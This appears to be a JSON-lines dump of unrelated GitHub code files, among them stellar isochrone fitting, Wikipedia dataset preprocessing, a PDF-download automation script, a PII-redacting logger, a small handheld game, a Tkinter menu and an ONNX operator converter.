df.loc[hi_index, :].values * norm_distance\n )\n new_data.loc[:, \"interpolated\"] = True\n df_interp = pd.concat([df_interp, new_data])\n\n df_interp.sort_index(inplace=True)\n df_interp.to_hdf(hdf_filename, \"df\")\n df_interp = pd.read_hdf(hdf_filename, \"df\")\n\n return df_interp\n\n def df_all(self):\n df = pd.concat([self.df_all_feh_interpolated(feh) for feh in self.fehs])\n return df\n\n @property\n def df(self):\n if self._df is None:\n self._df = self.read_hdf()\n self._df[\"dt_deep\"] = self.get_dt_deep()\n\n return self._df\n\n def get_dt_deep(self, compute=False):\n filename = os.path.join(self.datadir, \"dt_deep{}.h5\".format(self.kwarg_tag))\n\n compute = not os.path.exists(filename)\n\n if not compute:\n try:\n dt_deep = pd.read_hdf(filename, \"dt_deep\")\n except Exception:\n compute = True\n\n if compute:\n # need grid to work with first\n df = self.get_df()\n\n # Make bucket for derivative to go in\n df[\"dt_deep\"] = np.nan\n\n # Compute derivative for each (feh, age) isochrone, and fill in\n for f, m in tqdm(\n itertools.product(*df.index.levels[:2]),\n total=len(list(itertools.product(*df.index.levels[:2]))),\n desc=\"Computing dt/deep\",\n ):\n subdf = df.loc[f, m]\n log_age = np.log10(subdf[\"star_age\"])\n deriv = np.gradient(log_age, subdf[\"eep\"])\n subdf.loc[:, \"dt_deep\"] = deriv\n\n df.dt_deep.to_hdf(filename, \"dt_deep\")\n dt_deep = pd.read_hdf(filename, \"dt_deep\")\n\n return dt_deep\n\n @property\n def eep_param_filename(self):\n return os.path.join(self.datadir, \"eep_params{}.h5\".format(self.kwarg_tag))\n\n def fit_eep_section(self, a, b, order=3):\n fehs = 
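# Sketch of the fill-in step in df_all_feh_interpolated above: a track with a
# missing tail is rebuilt by linear interpolation, in initial mass, between the
# nearest lighter and heavier complete tracks sampled on the same EEP grid.
def blend_tracks(track_lo, track_hi, m_lo, m_hi, m):
    w = (m - m_lo) / (m_hi - m_lo)  # norm_distance in the code above
    return track_lo * (1.0 - w) + track_hi * w

lo = np.array([[1.0, 10.0], [2.0, 20.0]])
hi = np.array([[3.0, 30.0], [4.0, 40.0]])
print(blend_tracks(lo, hi, 1.0, 2.0, 1.5))  # halfway -> [[2. 20.] [3. 30.]]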
self.df.index.levels[0]\n ms = self.df.index.levels[1]\n columns = [\"p{}\".format(o) for o in range(order + 1)]\n p_df = pd.DataFrame(index=pd.MultiIndex.from_product((fehs, ms)), columns=columns)\n\n for feh, m in tqdm(\n itertools.product(fehs, ms),\n total=len(fehs) * len(ms),\n desc=\"Fitting age-eep relation for eeps {:.0f} to {:.0f} (order {})\".format(a, b, order),\n ):\n subdf = self.df.xs((feh, m), level=(\"initial_feh\", \"initial_mass\"))\n try:\n p = fit_section_poly(subdf.age.values, subdf.eep.values, a, b, order)\n except (TypeError, ValueError):\n p = [np.nan] * (order + 1)\n for c, n in zip(p, range(order + 1)):\n p_df.at[(feh, m), \"p{}\".format(n)] = c\n return p_df\n\n def fit_approx_eep(self, max_fit_eep=808):\n fehs = self.df.index.levels[0]\n ms = self.df.index.levels[1]\n columns = [\"p5\", \"p4\", \"p3\", \"p2\", \"p1\", \"p0\", \"A\", \"x0\", \"tau\"]\n par_df = pd.DataFrame(index=pd.MultiIndex.from_product((fehs, ms)), columns=columns)\n for feh, m in tqdm(\n itertools.product(fehs, ms),\n total=len(fehs) * len(ms),\n desc=\"Fitting approximate eep(age) function\",\n ):\n subdf = self.df.xs((feh, m), level=(\"initial_feh\", \"initial_mass\"))\n p0 = eep_fn_p0(subdf.age, subdf.eep)\n last_pfit = p0\n mask = subdf.eep < max_fit_eep\n try:\n if subdf.eep.max() < 500:\n raise RuntimeError\n pfit, _ = curve_fit(eep_fn, subdf.age.values[mask], subdf.eep.values[mask], p0, jac=eep_jac)\n except RuntimeError: # if the full fit barfs, just use the polynomial by setting A to zero, and the rest same as previous.\n pfit = list(np.polyfit(subdf.age.values[mask], subdf.eep.values[mask], 5)) + last_pfit[-3:]\n pfit[-3] = 0\n last_pfit = pfit\n par_df.loc[(feh, m), :] = pfit\n return par_df.astype(float)\n\n def write_eep_params(self, orders=None):\n if orders is None:\n orders = [7] * 2 + [3] + [1] * 6\n\n p_dfs = [self.fit_eep_section(a, b, order=o) for (a, b), o in zip(self.eep_sections, orders)]\n for df, (a, b) in zip(p_dfs, self.eep_sections):\n df.to_hdf(self.eep_param_filename, \"eep_{:.0f}_{:.0f}\".format(a, b))\n\n p_approx_df = self.fit_approx_eep()\n p_approx_df.to_hdf(self.eep_param_filename, \"approx\")\n\n def get_eep_interps(self):\n \"\"\"Get list of interp functions for piecewise polynomial params\n \"\"\"\n if not os.path.exists(self.eep_param_filename):\n self.write_eep_params()\n\n with pd.HDFStore(self.eep_param_filename) as store:\n interps = [DFInterpolator(store[\"eep_{:.0f}_{:.0f}\".format(a, b)]) for a, b in self.eep_sections]\n return interps\n\n def get_approx_eep_interp(self):\n if not os.path.exists(self.eep_param_filename):\n self.write_eep_params()\n\n with pd.HDFStore(self.eep_param_filename) as store:\n interp = DFInterpolator(store[\"approx\"])\n\n return interp\n\n @property\n def approx_eep_interp(self):\n if self._approx_eep_interp is None:\n self._approx_eep_interp = self.get_approx_eep_interp()\n\n return self._approx_eep_interp\n\n @property\n def eep_interps(self):\n if self._eep_interps is None:\n self._eep_interps = self.get_eep_interps()\n\n return self._eep_interps\n\n @property\n def primary_eeps_arr(self):\n if self._primary_eeps_arr is None:\n self._primary_eeps_arr = np.array(self.primary_eeps)\n return self._primary_eeps_arr\n\n def get_eep_fit(self, mass, age, feh, approx=False):\n eep_fn_pars = self.approx_eep_interp([feh, mass], \"all\")\n eep = eep_fn(age, *eep_fn_pars)\n if approx:\n return eep\n else:\n i, _ = searchsorted(self.primary_eeps_arr, eep)\n try:\n return polyval(self.eep_interps[i - 1]([feh, mass], \"all\"), 
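# Pattern used by fit_approx_eep above, as a hypothetical standalone helper:
# attempt the nonlinear least-squares fit, and if curve_fit fails to converge
# (it raises RuntimeError) fall back to a plain degree-`order` polynomial fit.
def fit_with_fallback(f, x, y, p0, order=5):
    try:
        pfit, _ = curve_fit(f, x, y, p0=p0)
        return pfit
    except RuntimeError:
        return np.polyfit(x, y, order)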
age)\n except IndexError:\n if age > eep_fn_pars[-2]:\n return polyval(\n self.eep_interps[-1]([feh, mass], \"all\"), age\n ) # assume you're in last bit\n else:\n getLogger().warning(\n \"EEP conversion failed for mass={}, age={}, feh={} (approx eep = {}). Returning nan.\".format(\n mass, age, feh, eep\n )\n )\n return np.nan\n\n def view_eep_fit(self, mass, feh, plot_fit=True, order=5, p0=None, plot_p0=False):\n import holoviews as hv\n\n hv.extension(\"bokeh\")\n subdf = self.df.xs((mass, feh), level=(\"initial_mass\", \"initial_feh\"))\n\n ds = hv.Dataset(subdf)\n pts = hv.Points(ds, kdims=[\"age\", \"eep\"], vdims=[\"phase\", \"interpolated\"]).options(\n tools=[\"hover\"], width=800, height=400, marker=\"+\"\n )\n primary_eeps = self.primary_eeps\n primary_ages = [subdf.loc[e].age for e in primary_eeps if e < subdf.eep.max()]\n\n from isochrones.eep import eep_fn, eep_jac, eep_fn_p0\n from scipy.optimize import curve_fit\n\n if p0 is None:\n p0 = eep_fn_p0(subdf.age.values, subdf.eep.values, order=order)\n\n m = subdf.eep < 808\n if plot_fit:\n pfit, _ = curve_fit(\n partial(eep_fn, order=order),\n subdf.age.values[m],\n subdf.eep.values[m],\n p0,\n jac=partial(eep_jac, order=order),\n )\n fit = hv.Points([(a, eep_fn(a, *pfit)) for a in subdf.age])\n if plot_p0:\n p0_fit = hv.Points([(a, eep_fn(a, *p0)) for a in subdf.age])\n\n olay = pts * hv.Points([(a, e) for a, e in zip(primary_ages, primary_eeps)]).options(size=8)\n if plot_fit:\n olay = olay * fit\n if plot_p0:\n olay = olay * p0_fit\n return olay\n","repo_name":"timothydmorton/isochrones","sub_path":"isochrones/mist/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":21060,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"21"} +{"seq_id":"34412904003","text":"import random\nimport gdown\nfrom zipfile import ZipFile\nfrom config import datasets_path\nimport os\nimport json\n\nallowed_chars = \"0123456789!@#$%^&*()-_+=\\\"':;[]{}/<>,.`~\\n\\\\\"\n\n\ndef download_wiki_datasets(file_path, output_folder):\n if not os.path.isfile(file_path):\n zip_file_path = os.path.join(output_folder, \"downloaded_file.zip\")\n gdown.download(id=file_path, output=zip_file_path, quiet=False)\n else:\n zip_file_path = file_path\n # Extract the contents of the ZIP file\n with ZipFile(zip_file_path, \"r\") as zip_ref:\n zip_ref.extractall(output_folder)\n # Delete the ZIP file\n datasets_file_path = os.path.join(output_folder, \"datasets.txt\")\n read_json_lines(output_folder, datasets_file_path)\n dataset_part_folder = os.path.join(output_folder, \"part\")\n if not os.path.isdir(dataset_part_folder):\n os.mkdir(dataset_part_folder)\n split_large_file(datasets_file_path, dataset_part_folder, chunk_size=50)\n txt_files = [\n f\n for f in os.listdir(dataset_part_folder)\n if f.endswith(\".txt\") and os.path.isfile(os.path.join(dataset_part_folder, f))\n ]\n return txt_files\n\n\ndef read_book(book):\n with open(book, \"r\", encoding=\"utf-8\") as f:\n return f.read()\n\n\ndef is_cjk(character):\n return any(\n [\n start <= ord(character) <= end\n for start, end in [\n (4352, 4607),\n (11904, 42191),\n (43072, 43135),\n (44032, 55215),\n (63744, 64255),\n (65072, 65103),\n (65381, 65500),\n (131072, 196607),\n ]\n ]\n )\n\n\ndef filter_data(data):\n print(\"Filtering data\")\n return \"\".join([char for char in data if char in allowed_chars or is_cjk(char)])\n\n\ndef load_book(book):\n print(f\"Loading book into ram\")\n return filter_data(str(read_book(book)))\n\n\ndef 
random_split_chunk(data, size=14, spliter=None):\n if spliter is not None:\n data = data.split(spliter)\n index = random.randrange(0, len(data))\n\n if spliter is not None:\n return spliter.join(data[index : index + size])\n else:\n return data[index : index + size]\n\n\ndef write_text_to_file(text, output_file):\n with open(output_file, \"a\", encoding=\"utf-8\") as file:\n if text.strip():\n file.write(text + \"\\n\")\n\n\ndef read_json_lines(folder_path, output_file):\n for root, dirs, files in os.walk(folder_path):\n for file_name in files:\n if \"wiki_\" in file_name:\n file_path = os.path.join(root, file_name)\n print(f\"Reading file: {file_path}\")\n\n with open(file_path, \"r\", encoding=\"utf-8\") as file:\n for line in file:\n try:\n json_content = json.loads(line)\n if \"text\" in json_content:\n text_content = json_content[\"text\"]\n write_text_to_file(text_content, output_file)\n except json.JSONDecodeError as e:\n print(\n f\"Error decoding JSON in {file_path}, line: {line}\\nError: {e}\"\n )\n\n\ndef split_large_file(input_file, output_folder, chunk_size=50):\n chunk_size_mb = chunk_size * 1024 * 1024\n with open(input_file, \"rb\") as f:\n part_num = 1\n while True:\n chunk = f.read(chunk_size_mb)\n if not chunk:\n break\n\n output_file = os.path.join(output_folder, f\"part_{part_num}.txt\")\n with open(output_file, \"w\", encoding=\"utf-8\") as part_file:\n part_file.write(chunk.decode(\"utf-8\", errors=\".gitignore\"))\n\n part_num += 1\n\n\nif __name__ == \"__main__\":\n txt_files = download_wiki_datasets(\n \"/Users/quicksandzn/Downloads/wiki_zh_2019.zip\", datasets_path\n )\n","repo_name":"quicksandznzn/Bark-Voice-Clone","sub_path":"process/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43643964571","text":"# Ideia de como funciona o programa que atualiza os PDFs:\n# O programa ficaria rodando de fundo;\n# A pagina web ficaria aberta o tempo todo no moto tela cheia (f11 ativo);\n# Ai quando o computador visse que era um horario especifico ele rodaria todos as funções que no fim realizam a atualização os PDFs de horário e calendário.\n\n# Importações:\nimport time\nfrom datetime import datetime\nimport pyautogui\nimport os\n\n# a função a seguir é uma função que realiza um looping infinito, o looping repete a cada 1 segundo e verifica se a hora no computador é uma hora especifica se for a hora especificada é chamado algumas funções:\ndef verificaTempo():\n # faz um laço infinito:\n while True:\n time.sleep(1) # Espera 1 segundo\n tempo_atual = datetime.now() # pega a data atual inteira\n hora_atual = tempo_atual.hour # pega apenas a hora\n minuto_atual = tempo_atual.minute # pega apenas o minuto\n segundo_atual = tempo_atual.second # pega apenas o segundo\n # if que verifica o tempo especifico:\n if hora_atual == 2 and minuto_atual == 20 and segundo_atual == 8:\n baixaPDFs() # chama a função que baixa os novos PDFs\n apagaArquivos() # chama a função que apaga os PDFs antigos\n moveArquivos() # chama a função que move os PDFs novos para a pasta correta\n break\n verificaTempo() # chama a função de novo\n\n# a função a seguir faz uma automação do telcado e do mouse para baixar os PDFs no site da fatec:\ndef baixaPDFs():\n # obs.: a pagina web do totem estara em fullScreen\n\n pyautogui.press('f11') # tira o fullScreen\n\n site_fatec = 'fatecsaocaetano.edu.br/' # link do site da fatec\n\n pyautogui.hotkey('ctrl', 't') # 
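# Corrected sketch of split_large_file above: the "errors" argument of
# bytes.decode must name a codec error handler ("ignore", "replace", ...);
# the original errors=".gitignore" raises LookupError at runtime. Note also
# that chunking by raw byte count can cut a multi-byte UTF-8 character in
# half, which errors="ignore" then silently drops at the chunk boundary.
def split_file(input_file, output_folder, chunk_mb=50):
    chunk_size = chunk_mb * 1024 * 1024
    with open(input_file, "rb") as f:
        part_num = 1
        while True:
            chunk = f.read(chunk_size)
            if not chunk:
                break
            output_file = os.path.join(output_folder, "part_{}.txt".format(part_num))
            with open(output_file, "w", encoding="utf-8") as part_file:
                part_file.write(chunk.decode("utf-8", errors="ignore"))
            part_num += 1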
abre uma nova guia\n pyautogui.hotkey('ctrl', 'l') # foca no campo de pesquisa de link do navegador\n pyautogui.write(site_fatec) # digita o link do site fatec\n pyautogui.press('enter') # aperta no enter\n\n baixaCalendario() # aqui chama a função que baixa o calendario\n baixaHorario() # aqui chama a função que baixa o horario\n\n time.sleep(5) # Espera 5 segundo\n\n pyautogui.hotkey('ctrl', '9') # vai pra ultima guia do navegador\n pyautogui.hotkey('ctrl', 'w') # fecha guia\n pyautogui.hotkey('ctrl', '9') # vai pra ultima guia do navegador\n pyautogui.press('f11') # coloca o fullScreen\n\n# essa é a função que baixa o calendario:\ndef baixaCalendario():\n time.sleep(5) # Espera 5 segundo\n\n pyautogui.click(x=710, y=430) # clica no botão do site da fatec que abre o drive que está o PDF do calendario\n\n time.sleep(2.5) # Espera 2.5 segundo\n\n pyautogui.click(x=1185, y=125) # clica no botão de baixar pdf\n\n time.sleep(5) # Espera 5 segundo\n\n pyautogui.hotkey('ctrl', 'w') # fecha a guia que está, a guia do drive com o PDF do calendario\n\n# essa é a função que baixa o horario:\ndef baixaHorario():\n time.sleep(5) # Espera 5 segundo\n\n pyautogui.click(x=910, y=430) # clica no botão do site da fatec que abre o drive que está o PDF do horario\n\n time.sleep(2.5) # Espera 2.5 segundo\n\n pyautogui.click(x=1185, y=125) # clica no botão de baixar pdf\n\n time.sleep(5) # Espera 5 segundo\n\n pyautogui.hotkey('ctrl', 'w') # fecha a guia que está, a guia do drive com o PDF do horario\n\n# aqui é a função que apaga os arquivos PDFs antigos:\ndef apagaArquivos():\n apagaHorario() # chama a função que apaga o arquivo do horario\n apagaCalendario() # chama a função que apaga o arquivo do calendario\n\n# função que realiza a remoção do arquivo PDF do horario:\ndef apagaHorario():\n pasta = 'PDFs' # nome da pasta\n arquivo = 'horario.pdf' # nome do arquivo\n caminho = os.path.join(pasta, arquivo) # aqui é o caminho relativo do arquivo\n\n # o if abaixo verifica se o arquivo existe e apaga ele:\n if os.path.exists(caminho):\n os.remove(caminho) # remove o arquivo\n\n# função que realiza a remoção do arquivo PDF do calendario:\ndef apagaCalendario():\n pasta = 'PDFs' # nome da pasta\n arquivo = 'calendario.pdf' # nome do arquivo\n caminho = os.path.join(pasta, arquivo) # aqui é o caminho relativo do arquivo\n\n # o if abaixo verifica se o arquivo existe e apaga ele:\n if os.path.exists(caminho):\n os.remove(caminho) # remove o arquivo\n\n# função que moves os arquivos para a pasta correta:\ndef moveArquivos():\n pasta = '/home/breno/Downloads/' # esse caminho da pasta onde os arquivos baixados estão salvos\n\n nomeHorario = 'horario' # nome relativo do arquivo PDF com o horario\n nomeCalendario = 'calendario' # nome relativo do arquivo PDF com o calendario\n\n # lista todos os arquivos da pasta:\n arquivos = [arquivo for arquivo in os.listdir(pasta) if os.path.isfile(os.path.join(pasta, arquivo))]\n\n # esse if abaixo passa por todos os nome dos arquivos:\n for arquivo in arquivos:\n # o if abaixo ve se o nome do arquivo contem a palavra horario:\n if nomeHorario in arquivo:\n moveHorario(pasta, arquivo, nomeHorario) # chama a função que move o arquivo do horario\n # o if abaixo ve se o nome do arquivo contem a palavra calendario:\n if nomeCalendario in arquivo:\n moveCalendario(pasta, arquivo, nomeCalendario) # chama a função que move o arquivo do calendario\n\n# função que move o horario:\ndef moveHorario(pasta, arquivo, nomeHorario):\n caminho_origem = os.path.join(pasta, arquivo) # caminho que 
está o arquivo baixado do horario\n caminho_destino = f'PDFs/{nomeHorario}.pdf' # caminho que o arquivo deverá ser colocado\n os.rename(caminho_origem, caminho_destino) # move o arquivo pra o local determinado\n\n# função que move o calendario:\ndef moveCalendario(pasta, arquivo, nomeCalendario):\n caminho_origem = os.path.join(pasta, arquivo) # caminho que está o arquivo baixado do calendario\n caminho_destino = f'PDFs/{nomeCalendario}.pdf' # caminho que o arquivo deverá ser colocado\n os.rename(caminho_origem, caminho_destino) # move o arquivo pra o local determinado\n\n# Aqui é um if de inicialização do arquivo Python:\nif __name__ == '__main__':\n verificaTempo()\n","repo_name":"BrenoCardoso2002/Totem-da-FATEC-SCS","sub_path":"Automacao/UpdatePdfs.py","file_name":"UpdatePdfs.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32523224817","text":"#!/usr/bin/env python3\n\"\"\" Obfuscate and return log message\n\"\"\"\nimport re\nfrom typing import List\nimport logging\n\n\nPII_FIELDS = ('name', 'email', 'phone', 'ssn', 'password')\n\n\nclass RedactingFormatter(logging.Formatter):\n \"\"\" Redacting Formatter class\n \"\"\"\n\n REDACTION = \"***\"\n FORMAT = \"[HOLBERTON] %(name)s %(levelname)s %(asctime)-15s: %(message)s\"\n SEPARATOR = \";\"\n\n def __init__(self, fields: List[str]):\n super(RedactingFormatter, self).__init__(self.FORMAT)\n self.fields = fields\n\n def format(self, record: logging.LogRecord) -> str:\n \"\"\" Filter values\n \"\"\"\n return filter_datum(\n self.fields,\n self.REDACTION, super().format(record), self.SEPARATOR)\n\n\ndef get_logger() -> logging.Logger:\n \"\"\"\n Implement a get_logger function that takes no arguments\n and returns a logging.Logger object.\n \"\"\"\n logger = logging.getLogger('user_data')\n logger.setLevel(logging.INFO)\n logger.propagate = False\n # Create console handler (ch) set level info\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n # streamhandler with redacting formatter\n ch.setFormatter(RedactingFormatter)\n # add handler to logger\n logger.addHandler(ch)\n\n return logger\n\n\ndef filter_datum(fields: List[str],\n redaction: str, message: str, separator: str) -> str:\n \"\"\" replace occurrences of certain field\n the log message passed in will be replaced\n with xxx\n \"\"\"\n for field in fields:\n message = re.sub(field + '=' + '.+?' 
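# Corrected sketch of get_logger above: logging.Handler.setFormatter needs a
# formatter *instance*, but the original passes the RedactingFormatter class
# itself, so record formatting fails at emit time. (filter_datum also splices
# `separator` into the regex unescaped; re.escape(separator) would be safer.)
def get_user_data_logger(fields):
    logger = logging.getLogger("user_data")
    logger.setLevel(logging.INFO)
    logger.propagate = False
    ch = logging.StreamHandler()
    ch.setLevel(logging.INFO)
    ch.setFormatter(RedactingFormatter(list(fields)))  # instance, not class
    logger.addHandler(ch)
    return logger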
+ separator,\n field + '=' + redaction + separator,\n message)\n return(message)\n","repo_name":"MontyWilliams/holbertonschool-web_back_end","sub_path":"0x02-personal_data/filtered_logger.py","file_name":"filtered_logger.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42876012615","text":"def login_disponivel(l):\n not_over = True\n name = l[1]\n if l[1] in l[2]:\n name = l[1]\n return name\n else:\n i = 1\n while not_over:\n if name+i in l[2] :\n not_over = False\n else:\n i+1\n return name+i","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_270/ch168_2020_06_20_21_18_11_051321.py","file_name":"ch168_2020_06_20_21_18_11_051321.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21926499659","text":"# Narwhal Globals file\nimport umachine as pok\nimport urandom as rand\nimport sprites\nimport sounds\n\nnarwhal_sprites = sprites.narwhal_sprites\nenemies_sprites = sprites.enemies_sprites\ncharge_jar = sprites.charge_jar\n\n\nindex = 0\nposition = 1 #0 up, 1 middle, 2 down\ntime = 0\nspeed = 2#speed of the obstacles\nmult = 1 #number of obstacles\ncurrent = 0 #current obstacles\n\ncx = 0\ncy = 0\ncind = {}\ny = 35\nx = 4\nscore = 0\ncharge = 0\ndashing = False\nbest = 0\nboost = 2\nboost_time = 0\nquit = False\ntitle = True\n\nseaGunkPart = []\nfor i in range(0, 30):\n gunk = {\"x\": 110, \"y\": rand.getrandbits(7)}\n seaGunkPart.append(gunk)\n \ndef initNarwhal():\n \n global seaGunkPart, quit, boost, boost_time, index, position, time, speed, mult, current, cx, cy, cind, x, y, score, charge, dashing, best\n index = 0\n \n #0 up, 1 middle, 2 down\n time = 0\n speed = 2#speed of the obstacles\n mult = 1 #number of obstacles\n current = 0 #current obstacles\n cx = 0\n cy = 0\n cind = {}\n y = 35\n x = 4\n score = 0\n charge = 0\n dashing = False\n boost = 2\n boost_time = 0\n quit = False\n \ndef drawTitle(screen, upg, eventtype):\n global quit, title, boost, boost_time, index, position, time, speed, mult, current, cx, cy, cind, x, y, score, charge, dashing, best\n \n pok.draw_text(3, 2, \"Explore the ocean depths!\",6)\n pok.draw_text(3, 3, \"Explore the ocean depths!\",3)\n \n pok.draw_text(20, 70, \"Best:\\n \"+str(best),6)\n pok.draw_text(20, 71, \"Best:\\n \"+str(best),3)\n \n if time <= 5:\n index = 0\n if time <= 10 and time > 5:\n index = 1\n if time <= 15 and time > 10:\n index = 2\n if time <= 20 and time > 15:\n index = 1\n \n if time > 20:\n time = 0\n screen.blit(narwhal_sprites[index], 45,25)\n \n screen.blit(enemies_sprites[0], 2,38)\n screen.blit(enemies_sprites[1], 90,38)\n \n \n if eventtype != upg.NOEVENT:\n if eventtype.type == upg.KEYDOWN:\n if eventtype.key == upg.BUT_B:\n quit = True\n title = False\n gameover = False\n else:\n title = False\n gameover = False\n initNarwhal()\n \ndef drawGameOver(screen, upg, eventtype):\n global title, gameover, cind, best, quit\n pok.draw_text(3, 2, \"Game over...\",6)\n pok.draw_text(3, 3, \"Game over...\",3)\n \n pok.draw_text(3, 12, \"Best:\\n \"+str(best),6)\n pok.draw_text(3, 13, \"Best:\\n \"+str(best),3)\n screen.blit(cind[\"spr\"], 45, 24)\n if eventtype != upg.NOEVENT:\n if eventtype.type == upg.KEYDOWN:\n if eventtype.key == upg.BUT_B:\n quit = True\n title = True\n gameover = False\n else:\n title = True\n gameover = False\n initNarwhal()\n \ndef drawMain(screen, upg, eventtype, audio):\n 
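# Corrected sketch of login_disponivel above (assuming l = [_, requested_login,
# taken_logins], per the exercise). The original has three bugs: the membership
# test is inverted, the bare expression `i+1` never increments i (so the loop
# never terminates), and `name+i` concatenates str with int (TypeError).
def login_disponivel(l):
    name = l[1]
    if name not in l[2]:
        return name
    i = 1
    while "{}{}".format(name, i) in l[2]:
        i += 1
    return "{}{}".format(name, i)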
global title, gameover, boost, boost_time, index, position, time, speed, mult, current, cx, cy, cind, x, y, score, charge, dashing, best\n boost_time+=1\n score = score+ 1*mult\n speed = boost*mult\n \n if boost_time > 500:\n boost += 1\n boost_time = 0\n \n if eventtype != upg.NOEVENT:\n if eventtype.type== upg.KEYDOWN:\n if eventtype.key == upg.K_UP:\n position = 0\n audio.play_sfx(sounds.low, len(sounds.low), True)\n if eventtype.key == upg.K_DOWN:\n position = 2\n audio.play_sfx(sounds.low, len(sounds.low), True)\n if eventtype.key == upg.K_RIGHT or eventtype.key == upg.BUT_A:\n if charge > 0 and not dashing:\n dashing = True\n if eventtype.key == upg.K_LEFT or eventtype.key == upg.BUT_B:\n mult = -2\n if eventtype.type == upg.KEYUP:\n if eventtype.key == upg.K_UP:\n position = 1\n if eventtype.key == upg.K_DOWN:\n position = 1\n if eventtype.key == upg.K_RIGHT or eventtype.key == upg.BUT_A:\n dashing = False\n if eventtype.key == upg.K_LEFT or eventtype.key == upg.BUT_B:\n mult = 1\n\n if position is 0:\n y = 5\n if position is 1:\n y = 35\n if position is 2:\n y = 65\n \n if time <= 5:\n index = 0\n if time <= 10 and time > 5:\n index = 1\n if time <= 15 and time > 10:\n index = 2\n if time <= 20 and time > 15:\n index = 1\n \n #Dashing\n if dashing and charge > 0:\n if charge - 5 <= 0:\n charge = 0\n dashing = False\n else:\n audio.play_sfx(sounds.mid, len(sounds.mid), True)\n charge -= 5\n mult = 2\n x = 19\n index = 3\n if not dashing:\n x = 4\n mult = 1\n \n if time > 20:\n time = 0\n if charge < 100 and not dashing:\n if charge + 25 > 100:\n charge = 100\n else:\n charge += 25\n screen.blit(narwhal_sprites[index], x, y) \n \n #enemies\n if current == 0:\n current += 1\n spr = rand.getrandbits(3)\n y = 0\n if spr < 2:\n y = 38\n if spr == 7:\n y = 32\n cind = {\"id\": spr, \"spr\": enemies_sprites[spr], \"x\": 110, \"y\": y}\n else:\n \n cind[\"x\"]-=speed\n if cind[\"x\"] < -16:\n current = 0\n \n if cind[\"id\"] < 7:\n if collide(x,y,cind[\"x\"], cind[\"y\"]):\n if cind[\"id\"] > 3 and dashing:\n print(\"Close call\") \n else:\n audio.play_sfx(sounds.lost, len(sounds.lost), True)\n gameover = True\n if score > best:\n best = score\n else:\n if collide2(x,y,cind[\"x\"],cind[\"y\"]):\n gameover = True\n if score > best:\n best = score\n \n screen.blit(cind[\"spr\"], cind[\"x\"], cind[\"y\"])\n pok.draw_text(3, 3, \"Distance: \"+str(score), 6) \n pok.draw_text(2, 2, \"Distance: \"+str(score), 3) \n \n for x in seaGunkPart:\n screen.blit(sprites.seaGunk, x[\"x\"], x[\"y\"])\n x[\"x\"] = x[\"x\"] - rand.getrandbits(3)\n if x[\"x\"] < 0:\n x[\"x\"]=110\n x[\"y\"] = rand.getrandbits(7)\n \n #charge draw\n screen.fill(7, upg.Rect(3,83,charge,3)) \n screen.blit(charge_jar, 2, 82)\n\n#collide with sea junk or shark\ndef collide(rx, ry, ax, ay):\n if ((rx < ax + 16) and (rx + 24 > ax) and (ry < ay + 50) and (ry + 18 > ay)):\n return True\n else:\n return False\n \ndef collide2(rx, ry, ax, ay):\n if ((rx < ax + 30) and (rx + 24 > ax) and (ry < ay + 16) and (ry + 18 > ay)):\n return True\n else:\n return False\n########################### ","repo_name":"Torbuntu/TorsGameGallery","sub_path":"narwhalGlobals.py","file_name":"narwhalGlobals.py","file_ext":"py","file_size_in_byte":6834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25483010705","text":"from tkinter import *\n\n# 윈도우 창 부분 인스턴스\nwindow = Tk()\n\n# 메뉴 부분 구성, mainMenu : 상위 메뉴\nmainMenu = Menu(window)\n# 메인 메뉴의 부모 창 -> window\nwindow.config(menu=mainMenu)\n# 파일 메뉴의 부모 창 
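# The collide()/collide2() pair above hard-codes the 24x18 narwhal box against
# two enemy sizes; the general axis-aligned test is one function. (Aside: the
# `position is 0` comparisons in drawMain rely on CPython's small-int caching;
# `==` is the correct operator for value comparison.)
def aabb_overlap(ax, ay, aw, ah, bx, by, bw, bh):
    # Two axis-aligned boxes overlap iff their intervals overlap on both axes.
    return ax < bx + bw and ax + aw > bx and ay < by + bh and ay + ah > by

assert aabb_overlap(0, 0, 10, 10, 5, 5, 10, 10)
assert not aabb_overlap(0, 0, 10, 10, 20, 0, 5, 5)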
-> 메인메뉴\nfileMenu = Menu(mainMenu)\nfileMenu2 = Menu(mainMenu)\n\nmainMenu.add_cascade(label=\"파일\", menu=fileMenu)\nmainMenu.add_cascade(label=\"파일2\", menu=fileMenu2)\n\n# 부모 메뉴 : 파일 1\nfileMenu.add_command(label=\"열기\")\nfileMenu.add_separator()\nfileMenu.add_command(label=\"종료\")\n\n# 부모 메뉴 : 파일 2\nfileMenu2.add_command(label=\"열기\")\nfileMenu2.add_separator()\nfileMenu2.add_command(label=\"종료\")\n\nwindow.mainloop()\n","repo_name":"hanga185/PyTest","sub_path":"PyTest230817-main/8.21/bookcode5/Code05-11.py","file_name":"Code05-11.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27158361531","text":"from nnoir.functions import *\nfrom .utils import *\n\n\nclass OpBatchNormalization(Op):\n\n def __init__(self, node, *args):\n super().__init__(node, *args)\n\n def to_function(self, env, constants):\n [x, gamma, beta, mean, var] = self.node.input\n if gamma not in constants:\n raise UnsupportedONNXOperation(self.node, 'missing gamma')\n if beta not in constants:\n raise UnsupportedONNXOperation(self.node, 'missing beta')\n if mean not in constants:\n raise UnsupportedONNXOperation(self.node, 'missing mean')\n if var not in constants:\n raise UnsupportedONNXOperation(self.node, 'missing var')\n eps = 1e-05\n for attr in self.node.attribute:\n if attr.name == 'epsilon':\n eps = attr.f\n return [\n BatchNormalization(\n [x],\n list(self.node.output),\n eps=eps,\n avg_mean=constants[mean],\n 